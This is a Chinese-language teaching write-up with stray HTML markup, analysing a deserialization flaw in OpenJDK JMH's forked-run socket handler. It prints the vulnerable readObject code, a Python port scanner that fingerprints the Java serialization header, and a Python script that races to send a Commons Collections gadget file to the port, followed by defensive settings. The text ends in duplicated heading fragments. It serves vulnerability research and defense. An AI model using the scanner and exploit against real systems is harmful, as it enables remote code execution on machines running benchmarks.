OpenJDK JMH反序列化漏洞挖掘分析教学文档<\/h1>

一、漏洞简介<\/h2>
JMH (Java Microbenchmark Harness) 是专门用于代码微基准测试的工具套件，主要用于方法层面的基准测试，精度可达纳秒级。该组件存在一个未被公开的反序列化漏洞，虽然实战意义不大，但作为研究思路具有参考价值。<\/p>

二、影响版本<\/h2>
该漏洞影响所有版本的JMH组件。<\/p>

三、漏洞挖掘分析<\/h2>

1. 漏洞入口分析<\/h3>
从官方DEMO开始分析：<\/p>
public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> RunnerException {<\/span>  
<\/span><\/span>    Options opt =<\/span> new<\/span> OptionsBuilder()<\/span>  
<\/span><\/span>            .<\/span>include<\/span>(<\/span>WhatsupBro.<\/span>class<\/span>.<\/span>getSimpleName<\/span>())<\/span>  
<\/span><\/span>            .<\/span>forks<\/span>(<\/span>1<\/span>)<\/span>  
<\/span><\/span>            .<\/span>build<\/span>();<\/span>  
<\/span><\/span>    new<\/span> Runner(<\/span>opt).<\/span>run<\/span>();<\/span>  
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键调用链：<\/p>

run()<\/code>方法检查JMH参数配置<\/li>
进入internalRun()<\/code>进行初始化<\/li>
调用runBenchmarks(benchmarks)<\/code>执行基准测试<\/li>
<\/ol>
2. 关键漏洞点<\/h3>
在runBenchmarks<\/code>方法中，重点关注case FORKED<\/code>分支：<\/p>
case<\/span> FORKED:<\/span>  
<\/span><\/span>    res =<\/span> runSeparate(<\/span>r);<\/span>  
<\/span><\/span>    break<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>runSeparate<\/code>方法中初始化了BinaryLinkServer<\/code>对象，并启动Acceptor<\/code>线程处理连接。<\/p>
3. 反序列化漏洞细节<\/h3>
在Handler<\/code>类中发现了不安全的反序列化操作：<\/p>
public<\/span> Handler<\/span>(<\/span>Socket socket)<\/span> throws<\/span> IOException {<\/span>  
<\/span><\/span>    this<\/span>.<\/span>socket<\/span> =<\/span> socket;<\/span>  
<\/span><\/span>    this<\/span>.<\/span>is<\/span> =<\/span> socket.<\/span>getInputStream<\/span>();<\/span>  
<\/span><\/span>    this<\/span>.<\/span>os<\/span> =<\/span> socket.<\/span>getOutputStream<\/span>();<\/span>  
<\/span><\/span>    oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> BufferedOutputStream(<\/span>os,<\/span> BUFFER_SIZE));<\/span>  
<\/span><\/span>    oos.<\/span>flush<\/span>();<\/span>  
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>@Override<\/span>  
<\/span><\/span>public<\/span> void<\/span> run<\/span>()<\/span> {<\/span>  
<\/span><\/span>    try<\/span> {<\/span>  
<\/span><\/span>        ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> BufferedInputStream(<\/span>is,<\/span> BUFFER_SIZE));<\/span>  
<\/span><\/span>        while<\/span> ((<\/span>obj =<\/span> ois.<\/span>readObject<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>  \/\/ 反序列化点
<\/span><\/span><\/span><\/span>            \/\/ 处理各种帧类型
<\/span><\/span><\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        \/\/ 异常处理
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 端口发现机制<\/h3>
服务端监听随机端口：<\/p>
private<\/span> int<\/span> getListenPort<\/span>()<\/span> {<\/span>  
<\/span><\/span>    return<\/span> Integer.<\/span>getInteger<\/span>(<\/span>"jmh.link.port"<\/span>,<\/span> 0<\/span>);<\/span>  \/\/ 默认随机端口
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>但可以通过识别Java序列化流标头AC ED 00 05<\/code>来发现开放端口。<\/p>
四、环境搭建<\/h2>

从官方仓库下载JMH<\/li>
等待依赖下载完成<\/li>
运行org\/openjdk\/jmh\/samples<\/code>下的任意DEMO<\/li>
<\/ol>
五、漏洞验证<\/h2>
1. 端口扫描POC<\/h3>
import<\/span> socket
<\/span><\/span>import<\/span> threading
<\/span><\/span>import<\/span> queue
<\/span><\/span>import<\/span> binascii
<\/span><\/span>from<\/span> concurrent.futures import<\/span> ThreadPoolExecutor
<\/span><\/span>import<\/span> sys
<\/span><\/span>
<\/span><\/span>TARGET_HOST =<\/span> "127.0.0.1"<\/span>
<\/span><\/span>PORT_RANGE =<\/span> range(1<\/span>, 65536<\/span>)
<\/span><\/span>TIMEOUT =<\/span> 1<\/span>
<\/span><\/span>MAX_THREADS =<\/span> 100<\/span>
<\/span><\/span>STREAM_HEADER =<\/span> b<\/span>"<\/span>\xAC\xED\x00\x05<\/span>"<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> check_port<\/span>(port):
<\/span><\/span>    try<\/span>:
<\/span><\/span>        sock =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>        sock.<\/span>settimeout(TIMEOUT)
<\/span><\/span>        sock.<\/span>connect((TARGET_HOST, port))
<\/span><\/span>        data =<\/span> sock.<\/span>recv(1024<\/span>)
<\/span><\/span>        if<\/span> data.<\/span>startswith(STREAM_HEADER):
<\/span><\/span>            hex_data =<\/span> binascii.<\/span>hexlify(data[:4<\/span>]).<\/span>decode().<\/span>upper()
<\/span><\/span>            result_queue.<\/span>put((port, hex_data))
<\/span><\/span>        sock.<\/span>close()
<\/span><\/span>    except<\/span> (socket.<\/span>timeout, socket.<\/span>error):
<\/span><\/span>        pass<\/span>
<\/span><\/span><\/code><\/pre>2. 漏洞利用POC<\/h3>
需要添加Commons Collections依赖：<\/p>
<dependency><\/span>  
<\/span><\/span>    <groupId><\/span>commons-collections<\/groupId><\/span>  
<\/span><\/span>    <artifactId><\/span>commons-collections<\/artifactId><\/span>  
<\/span><\/span>    <version><\/span>3.1<\/version><\/span>  
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>利用脚本：<\/p>
import<\/span> socket
<\/span><\/span>import<\/span> time
<\/span><\/span>
<\/span><\/span>def<\/span> connect_to_server<\/span>():
<\/span><\/span>    max_attempts =<\/span> 100000<\/span>
<\/span><\/span>    attempts =<\/span> 0<\/span>
<\/span><\/span>    while<\/span> attempts <<\/span> max_attempts:
<\/span><\/span>        client_socket =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>        host =<\/span> "127.0.0.1"<\/span>
<\/span><\/span>        port =<\/span> 9004<\/span>  # 修改为目标端口<\/span>
<\/span><\/span>        try<\/span>:
<\/span><\/span>            client_socket.<\/span>connect((host, port))
<\/span><\/span>            return<\/span> client_socket
<\/span><\/span>        except<\/span> socket.<\/span>error:
<\/span><\/span>            attempts +=<\/span> 1<\/span>
<\/span><\/span>            time.<\/span>sleep(1<\/span>)
<\/span><\/span>    return<\/span> None<\/span>
<\/span><\/span>
<\/span><\/span>while<\/span> True<\/span>:
<\/span><\/span>    client_socket =<\/span> connect_to_server()
<\/span><\/span>    if<\/span> client_socket:
<\/span><\/span>        try<\/span>:
<\/span><\/span>            with<\/span> open("cc6calc.ser"<\/span>, "rb"<\/span>) as<\/span> file:
<\/span><\/span>                while<\/span> True<\/span>:
<\/span><\/span>                    data_to_send =<\/span> file.<\/span>read(1024<\/span>)
<\/span><\/span>                    if<\/span> not<\/span> data_to_send:
<\/span><\/span>                        break<\/span>
<\/span><\/span>                    client_socket.<\/span>send(data_to_send)
<\/span><\/span>        finally<\/span>:
<\/span><\/span>            client_socket.<\/span>close()
<\/span><\/span><\/code><\/pre>3. 利用限制条件<\/h3>

目标WEB应用需要同时引用JMH组件和可利用的依赖(如Commons Collections)<\/li>
攻击工具需要比项目提前运行监听端口<\/li>
需要扫描发现基准测试运行的随机端口<\/li>
<\/ol>
六、总结与防御建议<\/h2>
1. 漏洞特点<\/h3>

需要特定条件才能利用<\/li>
需要抢占连接通道(第一个连接由JMH自身建立)<\/li>
端口随机但可通过特征识别<\/li>
<\/ol>
2. 防御措施<\/h3>

使用固定端口参数运行JMH: -Djmh.link.port=固定端口<\/code><\/li>
添加JMH参数: -Djmh.ignoreLock=true<\/code><\/li>
网络层面限制JMH端口的外部访问<\/li>
避免在生产环境使用JMH基准测试<\/li>
<\/ol>
3. 研究价值<\/h3>
虽然该漏洞实战利用价值有限，但提供了以下研究思路：<\/p>

对Java基准测试组件的安全审计方法<\/li>
随机端口服务的识别技术<\/li>
抢占式攻击在反序列化漏洞中的应用<\/li>
<\/ol>
该漏洞分析展示了即使是非传统Web组件也可能存在安全隐患，强调了全面安全审计的重要性。<\/p>
OpenJDK JMH反序列化漏洞挖掘分析教学文档<\/h1>

二、影响版本<\/h2> 该漏洞影响所有版本的JMH组件。<\/p>

三、漏洞挖掘分析<\/h2>

五、漏洞验证<\/h2>

六、总结与防御建议<\/h2>

二、影响版本<\/h2>
该漏洞影响所有版本的JMH组件。<\/p>
